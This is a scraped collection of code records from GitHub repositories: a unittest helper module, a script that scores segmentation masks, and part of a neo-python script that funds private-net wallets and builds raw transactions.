self.perform_task()\n \n\ndef main():\n my_bot = Bot()\n my_bot.start()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "SS-FS-58/LinkedIn-Auto-Request-Connection", "sub_path": "youtube_business_email.py", "file_name": "youtube_business_email.py", "file_ext": "py", "file_size_in_byte": 3553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "threading.Thread", "line_number": 14, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 16, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 17, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 30, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxOptions", "line_number": 37, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.FirefoxProfile", "line_number": 40, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.frame_to_be_available_and_switch_to_it", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 73, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 77, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 77, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "40506905769", "text": "import os\nimport sys\nimport unittest\nimport warnings\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom io import StringIO\nfrom timeit import Timer\nfrom typing import Any, Callable, Dict, List, Optional, Union\n\nimport numpy\nfrom numpy.testing import assert_allclose\n\n\ndef unit_test_going():\n \"\"\"\n Enables a flag telling the script is running while testing it.\n Avois unit tests to be very long.\n \"\"\"\n going = int(os.environ.get(\"UNITTEST_GOING\", 0))\n return going == 1\n\n\ndef ignore_warnings(warns: List[Warning]) -> Callable:\n \"\"\"\n Catches warnings.\n\n :param warns: warnings to ignore\n \"\"\"\n\n def wrapper(fct):\n if warns is None:\n raise AssertionError(f\"warns cannot be None for '{fct}'.\")\n\n def call_f(self):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", warns)\n return fct(self)\n\n return call_f\n\n return wrapper\n\n\ndef measure_time(\n stmt: Union[str, Callable],\n context: Optional[Dict[str, Any]] = None,\n repeat: int = 10,\n number: int = 50,\n warmup: int = 1,\n div_by_number: bool = True,\n max_time: Optional[float] = None,\n) -> Dict[str, Any]:\n \"\"\"\n Measures a statement and returns the results as a dictionary.\n\n :param stmt: string or callable\n :param context: variable to know in a dictionary\n :param repeat: average over *repeat* experiment\n :param number: number of executions in one row\n :param warmup: number of iteration to do before starting the\n real measurement\n :param div_by_number: divide by the number of executions\n :param max_time: execute the statement until the total goes\n beyond this time (approximatively), *repeat* is ignored,\n *div_by_number* must be set to True\n :return: dictionary\n\n .. runpython::\n :showcode:\n\n from teachcompute.ext_test_case import measure_time\n from math import cos\n\n res = measure_time(lambda: cos(0.5))\n print(res)\n\n See `Timer.repeat `_\n for a better understanding of parameter *repeat* and *number*.\n The function returns a duration corresponding to\n *number* times the execution of the main statement.\n\n .. versionchanged:: 0.4\n Parameter *max_time* was added.\n \"\"\"\n if not callable(stmt) and not isinstance(stmt, str):\n raise TypeError(\n f\"stmt is not callable or a string but is of type {type(stmt)!r}.\"\n )\n if context is None:\n context = {}\n\n if isinstance(stmt, str):\n tim = Timer(stmt, globals=context)\n else:\n tim = Timer(stmt)\n\n if warmup > 0:\n warmup_time = tim.timeit(warmup)\n else:\n warmup_time = 0\n\n if max_time is not None:\n if not div_by_number:\n raise ValueError(\n \"div_by_number must be set to True of max_time is defined.\"\n )\n i = 1\n total_time = 0\n results = []\n while True:\n for j in (1, 2):\n number = i * j\n time_taken = tim.timeit(number)\n results.append((number, time_taken))\n total_time += time_taken\n if total_time >= max_time:\n break\n if total_time >= max_time:\n break\n ratio = (max_time - total_time) / total_time\n ratio = max(ratio, 1)\n i = int(i * ratio)\n\n res = numpy.array(results)\n tw = res[:, 0].sum()\n ttime = res[:, 1].sum()\n mean = ttime / tw\n ave = res[:, 1] / res[:, 0]\n dev = (((ave - mean) ** 2 * res[:, 0]).sum() / tw) ** 0.5\n mes = dict(\n average=mean,\n deviation=dev,\n min_exec=numpy.min(ave),\n max_exec=numpy.max(ave),\n repeat=1,\n number=tw,\n ttime=ttime,\n )\n else:\n res = numpy.array(tim.repeat(repeat=repeat, number=number))\n if div_by_number:\n res /= number\n\n mean = numpy.mean(res)\n dev = numpy.mean(res**2)\n dev = (dev - mean**2) ** 0.5\n mes = dict(\n average=mean,\n deviation=dev,\n min_exec=numpy.min(res),\n max_exec=numpy.max(res),\n repeat=repeat,\n number=number,\n ttime=res.sum(),\n )\n\n if \"values\" in context:\n if hasattr(context[\"values\"], \"shape\"):\n mes[\"size\"] = context[\"values\"].shape[0]\n else:\n mes[\"size\"] = len(context[\"values\"])\n else:\n mes[\"context_size\"] = sys.getsizeof(context)\n mes[\"warmup_time\"] = warmup_time\n return mes\n\n\nclass ExtTestCase(unittest.TestCase):\n _warns = []\n\n def assertEndsWith(self, string, suffix):\n if not string.endswith(suffix):\n raise AssertionError(f\"{string!r} does not end with {suffix!r}.\")\n\n def assertExists(self, name):\n if not os.path.exists(name):\n raise AssertionError(f\"File or folder {name!r} does not exists.\")\n\n def assertEqualArray(\n self,\n expected: numpy.ndarray,\n value: numpy.ndarray,\n atol: float = 0,\n rtol: float = 0,\n ):\n self.assertEqual(expected.dtype, value.dtype)\n self.assertEqual(expected.shape, value.shape)\n assert_allclose(expected, value, atol=atol, rtol=rtol)\n\n def assertAlmostEqual(\n self,\n expected: numpy.ndarray,\n value: numpy.ndarray,\n atol: float = 0,\n rtol: float = 0,\n ):\n if not isinstance(expected, numpy.ndarray):\n expected = numpy.array(expected)\n if not isinstance(value, numpy.ndarray):\n value = numpy.array(value).astype(expected.dtype)\n self.assertEqualArray(expected, value, atol=atol, rtol=rtol)\n\n def assertRaise(self, fct: Callable, exc_type: Exception):\n try:\n fct()\n except exc_type as e:\n if not isinstance(e, exc_type):\n raise AssertionError(f\"Unexpected exception {type(e)!r}.\")\n return\n raise AssertionError(\"No exception was raised.\")\n\n def assertEmpty(self, value: Any):\n if value is None:\n return\n if len(value) == 0:\n return\n raise AssertionError(f\"value is not empty: {value!r}.\")\n\n def assertNotEmpty(self, value: Any):\n if value is None:\n raise AssertionError(f\"value is empty: {value!r}.\")\n if isinstance(value, (list, dict, tuple, set)):\n if len(value) == 0:\n raise AssertionError(f\"value is empty: {value!r}.\")\n\n def assertStartsWith(self, prefix: str, full: str):\n if not full.startswith(prefix):\n raise AssertionError(f\"prefix={prefix!r} does not start string {full!r}.\")\n\n @classmethod\n def tearDownClass(cls):\n for name, line, w in cls._warns:\n warnings.warn(f\"\\n{name}:{line}: {type(w)}\\n {str(w)}\")\n\n def capture(self, fct: Callable):\n \"\"\"\n Runs a function and capture standard output and error.\n\n :param fct: function to run\n :return: result of *fct*, output, error\n \"\"\"\n sout = StringIO()\n serr = StringIO()\n with redirect_stdout(sout):\n with redirect_stderr(serr):\n res = fct()\n return res, sout.getvalue(), serr.getvalue()\n", "repo_name": "sdpython/teachcompute", "sub_path": "teachcompute/ext_test_case.py", "file_name": "ext_test_case.py", "file_ext": "py", "file_size_in_byte": 7441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "warnings.catch_warnings", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "timeit.Timer", "line_number": 94, "usage_type": "call"}, {"api_name": "timeit.Timer", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 164, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 183, "usage_type": "attribute"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 200, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 220, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 234, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 236, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 243, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 244, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 245, "usage_type": "call"}, {"api_name": "contextlib.redirect_stderr", "line_number": 246, "usage_type": "call"}]}
+{"seq_id": "69874272088", "text": "import argparse\nimport os\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import defaultdict\nimport cv2\nimport glob\n\n\ndef calculate_metrics(gen_mask, gt_mask, threshold=0, skip_undetected=False):\n uncertain_zone = np.all(gt_mask == 128, axis=2)\n gt_human_mask = np.any(gt_mask > 0, axis=2) & (~uncertain_zone)\n\n gen_mask_bin = gen_mask > threshold\n gen_mask_bin = gen_mask_bin & (~uncertain_zone)\n\n if gt_human_mask.sum() == 0:\n return defaultdict(lambda: np.nan)\n if skip_undetected and gen_mask_bin.sum() == 0:\n return defaultdict(lambda: np.nan)\n\n overlap_sum = (gen_mask_bin & gt_human_mask).sum()\n union_sum = (gen_mask_bin | gt_human_mask).sum()\n\n gen_mask_soft = gen_mask / 255.0 * (~uncertain_zone).astype(int)\n overlap_sum_soft = (gen_mask_soft * gt_human_mask.astype(int)).sum()\n union_sum_soft = (gen_mask_soft + gt_human_mask.astype(int)).clip(0, 1).sum()\n\n metrics = dict()\n if overlap_sum == 0:\n return defaultdict(lambda: np.nan)\n metrics['iou'] = overlap_sum / union_sum\n metrics['f1'] = 2 * overlap_sum / (union_sum + overlap_sum)\n metrics['precision'] = overlap_sum / gen_mask_bin.sum()\n metrics['recall'] = overlap_sum / gt_human_mask.sum()\n\n metrics['iou_soft'] = overlap_sum_soft / union_sum_soft\n metrics['f1_soft'] = 2 * overlap_sum_soft / (union_sum_soft + overlap_sum_soft)\n # metrics['precision'] = overlap_sum_soft / gen_mask_soft.sum()\n # metrics['recall'] = overlap_sum_soft / gt_human_mask.sum()\n\n return metrics\n\n\ndef eval_dir(gen_masks_dir, gt_masks_dir, threshold=64):\n metric_list = defaultdict(list)\n\n if not os.path.isdir(gen_masks_dir):\n print(f'No directory {gen_masks_dir}')\n return metric_list\n gen_masks_paths = [\n os.path.join(gen_masks_dir, f) for f in os.listdir(gen_masks_dir) if f.endswith('.png')\n ]\n assert len(os.listdir(gt_masks_dir)) >= len(\n gen_masks_paths\n ), f'More generated masks than gt: {len(gen_masks_paths)} vs {gt_masks_dir}'\n\n for gen_mask_path in gen_masks_paths:\n gen_mask = cv2.imread(gen_mask_path, 0)\n assert gen_mask is not None, gen_mask_path\n\n gt_path = os.path.join(gt_masks_dir, os.path.basename(gen_mask_path).replace('_img.png', '.png'))\n gt_mask = cv2.imread(gt_path)\n assert gt_mask is not None, gt_path\n assert gen_mask.shape == gt_mask.shape[:2], (gen_mask.shape, gt_mask.shape)\n\n metrics = calculate_metrics(gen_mask, gt_mask, threshold=threshold)\n for key, value in metrics.items():\n metric_list[key].append(value)\n\n return metric_list\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'gen_mask_dirnames', help='Names of folders with generated masks separated by a comma'\n )\n parser.add_argument('gt_mask_dirname', help='Folder name with ground truth masks')\n parser.add_argument('parent_dir', help='Folder name with ground truth masks')\n parser.add_argument('--csv_dir', help='Where to write results as .csv for each metric')\n args = parser.parse_args()\n\n os.makedirs(args.csv_dir, exist_ok=True)\n assert os.path.isdir(args.parent_dir), f'Not a directory: {args.parent_dir}'\n gen_mask_dirnames = [d.strip() for d in args.gen_mask_dirnames.split(',')]\n\n vid_names = sorted(\n [d for d in os.listdir(args.parent_dir) if os.path.isdir(os.path.join(args.parent_dir, d))]\n )\n metric_rows = defaultdict(lambda: [[''] + vid_names + ['Mean']])\n\n for method in tqdm(gen_mask_dirnames):\n tqdm.write(f'Method in progress: {method}')\n metric_lists = defaultdict(lambda: [method])\n for dir_name in vid_names:\n dir_metrics = eval_dir(\n os.path.join(args.parent_dir, dir_name, method),\n os.path.join(args.parent_dir, dir_name, args.gt_mask_dirname),\n )\n for key in set(metric_lists.keys()).union(dir_metrics.keys()):\n metric_lists[key].append(\n np.nanmean(dir_metrics[key]) if len(dir_metrics[key]) > 0 else 0.0\n )\n metric_means = {key: np.nanmean(values[1:]) for key, values in metric_lists.items()}\n for metric in metric_lists:\n metric_rows[metric].append(metric_lists[metric] + [metric_means[metric]])\n tqdm.write(f'Finished!\\n-------------')\n for metric, rows in metric_rows.items():\n np.savetxt(\n os.path.join(args.csv_dir, f'{metric}.csv'),\n np.array(rows).astype(str),\n fmt='%s',\n delimiter=',',\n )\n", "repo_name": "EgorNemchinov/HumanBGSegmentation", "sub_path": "scripts/eval_dir.py", "file_name": "eval_dir.py", "file_ext": "py", "file_size_in_byte": 4609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.all", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 12, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 18, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 20, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 63, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 91, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 94, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 94, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 105, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 108, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.savetxt", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "39409294307", "text": "#!/usr/bin/env python3\nfrom time import sleep\nimport threading\nimport traceback\nimport sys\nimport argparse\n\nfrom logzero import logger\nfrom neocore.Fixed8 import Fixed8\nfrom neocore.UInt256 import UInt256\nfrom neocore.UInt160 import UInt160\nfrom twisted.internet import reactor, task\n\nfrom neo.Core.Blockchain import Blockchain\nfrom neo.Core.CoinReference import CoinReference\nfrom neo.Core.TX.Transaction import TransactionOutput, ContractTransaction, TXFeeError\nfrom neo.Core.TX.TransactionAttribute import TransactionAttribute, TransactionAttributeUsage\nfrom neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain\nfrom neo.Implementations.Wallets.peewee.UserWallet import UserWallet\nfrom neo.Network.NodeLeader import NodeLeader\nfrom neo.Prompt.Commands import Send, Wallet\nfrom neo.Prompt.Utils import get_asset_id, lookup_addr_str, get_asset_amount\nfrom neo.Settings import settings\nfrom neo.SmartContract.ContractParameterContext import ContractParametersContext\nfrom neo.Wallets.utils import to_aes_key\n\nWALLET_PWD = \"nspcc\"\nWALLET_PATH = \"/wallets/wallet\"\nMASTER_WALLET_PWD = \"coz\"\nMASTER_WALLET_PATH = \"/neo-python/neo-privnet.wallet\"\nWALLET_DB_PATH = \"/wallets/db.log\"\nBLOCK_AMOUNT = 10\n\n# user defined params\nTX_FILE = \"/root/raw.txs\"\nPREMADE_NEO = 10\nPREMADE_GAS = 2.0\nTX_NEO = 3\nTX_GAS = 1.0\nTOTAL_AMOUNT = 1000\n\n\ndef read_wallet_db():\n with open(WALLET_DB_PATH, 'r') as f:\n database = f.read().splitlines()\n return database\n\ndef write_raw_db(hashes, path):\n with open(path, 'w') as f:\n for hash in hashes:\n f.write(hash.decode(\"ascii\")+\"\\n\")\n\ndef process_transaction(wallet, contract_tx, scripthash_from=None, scripthash_change=None, fee=None, owners=None, user_tx_attributes=None):\n try:\n tx = wallet.MakeTransaction(tx=contract_tx,\n change_address=scripthash_change,\n fee=fee,\n from_addr=scripthash_from)\n except ValueError:\n print(\"Insufficient funds. No unspent outputs available for building the transaction.\\n\"\n \"If you are trying to sent multiple transactions in 1 block, then make sure you have enough 'vouts'\\n.\"\n \"Use `wallet unspent` and `wallet address split`, or wait until the first transaction is processed before sending another.\")\n raise Exception('oh no')\n except TXFeeError as e:\n print(e)\n raise Exception('oh no')\n\n if tx is None:\n print(\"Insufficient funds\")\n raise Exception('oh no')\n\n try:\n input_coinref = wallet.FindCoinsByVins(tx.inputs)[0]\n source_addr = input_coinref.Address\n for order in tx.outputs:\n dest_addr = order.Address\n value = order.Value.ToString() # fixed8\n if order.AssetId == Blockchain.Default().SystemShare().Hash:\n asset_name = 'NEO'\n else:\n asset_name = 'GAS'\n\n if source_addr != dest_addr:\n print(f\"Sending {value} {asset_name} from {source_addr} to {dest_addr}\")\n else:\n print(f\"Returning {value} {asset_name} as change to {dest_addr}\")\n print(\" \")\n\n standard_contract = wallet.GetStandardAddress()\n\n if scripthash_from is not None:\n signer_contract = wallet.GetContract(scripthash_from)\n else:\n signer_contract = wallet.GetContract(standard_contract)\n\n if not signer_contract.IsMultiSigContract and owners is None:\n data = standard_contract.Data\n tx.Attributes = [TransactionAttribute(usage=TransactionAttributeUsage.Script,\n data=data)]\n\n # insert any additional user specified tx attributes\n tx.Attributes = tx.Attributes + user_tx_attributes\n\n context = ContractParametersContext(tx, isMultiSig=signer_contract.IsMultiSigContract)\n wallet.Sign(context)\n\n if context.Completed:\n tx.scripts = context.GetScripts()\n relayed = NodeLeader.Instance().Relay(tx)\n\n if relayed:\n wallet.SaveTransaction(tx)\n return tx\n else:\n print(\"Could not relay tx %s \" % tx.Hash.ToString())\n raise Exception('oh no')\n\n else:\n print(\"Transaction initiated, but the signature is incomplete. Use the `sign` command with the information below to complete signing.\")\n print(json.dumps(context.ToJson(), separators=(',', ':')))\n raise Exception('oh no')\n\n except Exception as e:\n print(\"Could not send: %s \" % e)\n traceback.print_stack()\n traceback.print_exc()\n\n return\n\ndef construct_send_many(wallet, outgoing, start, data, asset, amount):\n logger.info(\"Constructing %s : %d-%d\" % (asset, start, start+outgoing-1))\n output = []\n for i in range(outgoing):\n try:\n assetId = get_asset_id(wallet, asset)\n address_to = data[start+i]\n scripthash_to = lookup_addr_str(wallet, address_to)\n if scripthash_to is None:\n logger.debug(\"invalid destination address\")\n return\n f8amount = get_asset_amount(amount, assetId)\n if f8amount is False:\n logger.debug(\"invalid amount\")\n return\n tx_output = TransactionOutput(AssetId=assetId, Value=f8amount, script_hash=scripthash_to)\n output.append(tx_output)\n except KeyboardInterrupt:\n print('Transaction cancelled')\n return\n contract_tx = ContractTransaction(outputs=output)\n\n scripthash_from = None\n scripthash_change = None\n owners = None\n user_tx_attributes = []\n fee = Fixed8.Zero()\n\n return [contract_tx, scripthash_from, scripthash_change, fee, owners, user_tx_attributes]\n\ndef create_raw_transaction(walletpath, source, dest, txidNeo, txidGas, n):\n # const for asset id\n gas_asset_id = Blockchain.SystemCoin().Hash\n neo_asset_id = Blockchain.SystemShare().Hash\n\n # open source wallet for later transaction signing\n wallet = UserWallet.Open(walletpath, to_aes_key(WALLET_PWD))\n\n source_script_hash = wallet.ToScriptHash(source)\n destination_script_hash = wallet.ToScriptHash(dest)\n\n contract_tx = ContractTransaction()\n contract_tx.raw_tx = True\n\n # here we creating vin\n input1 = CoinReference(prev_hash=UInt256.ParseString(txidNeo), prev_index=int(n))\n input2 = CoinReference(prev_hash=UInt256.ParseString(txidGas), prev_index=int(n))\n contract_tx.inputs = [input1, input2]\n\n # here we creating vout (src [10 NEO] -> { dst [3 NEO]; src [7 NEO] })\n send_to_destination_output1 = TransactionOutput(AssetId=neo_asset_id, Value=Fixed8.FromDecimal(TX_NEO), script_hash=destination_script_hash)\n return_change_output1 = TransactionOutput(AssetId=neo_asset_id, Value=Fixed8.FromDecimal(PREMADE_NEO-TX_NEO), script_hash=source_script_hash)\n return_change_output2 = TransactionOutput(AssetId=gas_asset_id, Value=Fixed8.FromDecimal(TX_GAS), script_hash=source_script_hash)\n contract_tx.outputs = [send_to_destination_output1, return_change_output1, return_change_output2]\n\n # time to sign\n context = ContractParametersContext(contract_tx)\n wallet.Sign(context)\n\n # confirmation scripts\n contract_tx.scripts = context.GetScripts()\n\n raw_tx = contract_tx.ToArray()\n return raw_tx\n\ndef construct_raw_many(outgoing, start, data, txidNeo, txidGas):\n output = []\n for i in range(outgoing):\n try:\n pos = start + i\n filename = WALLET_PATH + \"%d\" % pos\n tx = create_raw_transaction(filename, data[pos], data[pos + TOTAL_AMOUNT], txidNeo, txidGas, i)\n output.append(tx)\n logger.info(\"Rawed transaction %d\" % pos)\n\n except KeyboardInterrupt:\n print('Transaction cancelled')\n return\n\n return output\n\ndef main_routine():\n # Here we awaiting local node to synchronize with private-net\n while True:\n if Blockchain.Default().Height != Blockchain.Default().HeaderHeight or Blockchain.Default().Height < 10:\n logger.info(\"...awaits %s/%s\" % (Blockchain.Default().Height, Blockchain.Default().HeaderHeight))\n sleep(2)\n else:\n break\n\n bc_height = Blockchain.Default().Height\n logger.info(\"Syncronized. Height %s Now open wallet:\" % bc_height)\n txsNeo = []\n txsGas = []\n hashes = []\n\n try:\n wallet = UserWallet.Open(MASTER_WALLET_PATH, to_aes_key(MASTER_WALLET_PWD))\n loop = task.LoopingCall(wallet.ProcessBlocks)\n loop.start(.5)\n\n logger.info(\"Wallet opened\")\n\n wallet_db = read_wallet_db()\n\n sleep(5)\n # In this block we transfer NEO assets from master wallet to generated wallets\n for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n pre_tx = construct_send_many(wallet, BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, 'NEO', str(PREMADE_NEO))\n funds_source_script_hash = wallet.ToScriptHash(wallet.Addresses[0])\n tx = process_transaction(wallet, contract_tx=pre_tx[0], scripthash_from=funds_source_script_hash,\n scripthash_change=pre_tx[2], fee=pre_tx[3], owners=pre_tx[4],\n user_tx_attributes=pre_tx[5])\n if tx is None:\n continue\n tx_hash = tx.Hash.ToString()\n txsNeo.append(tx_hash)\n while True:\n # Try to find transaction in blockchain\n sleep(0.5)\n _tx, height = Blockchain.Default().GetTransaction(tx_hash)\n if height > 0:\n break\n sleep(1)\n\n # In this block we transfer GAS assets from master wallet to generated wallets\n for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n pre_tx = construct_send_many(wallet, BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, 'GAS', str(PREMADE_GAS))\n funds_source_script_hash = wallet.ToScriptHash(wallet.Addresses[0])\n tx = process_transaction(wallet, contract_tx=pre_tx[0], scripthash_from=funds_source_script_hash,\n scripthash_change=pre_tx[2], fee=pre_tx[3], owners=pre_tx[4],\n user_tx_attributes=pre_tx[5])\n if tx is None:\n continue\n tx_hash = tx.Hash.ToString()\n txsGas.append(tx_hash)\n while True:\n # Try to find transaction in blockchain\n sleep(0.5)\n _tx, height = Blockchain.Default().GetTransaction(tx_hash)\n if height > 0:\n break\n sleep(1)\n\n loop.stop()\n wallet.Close()\n logger.info(\"Wallet 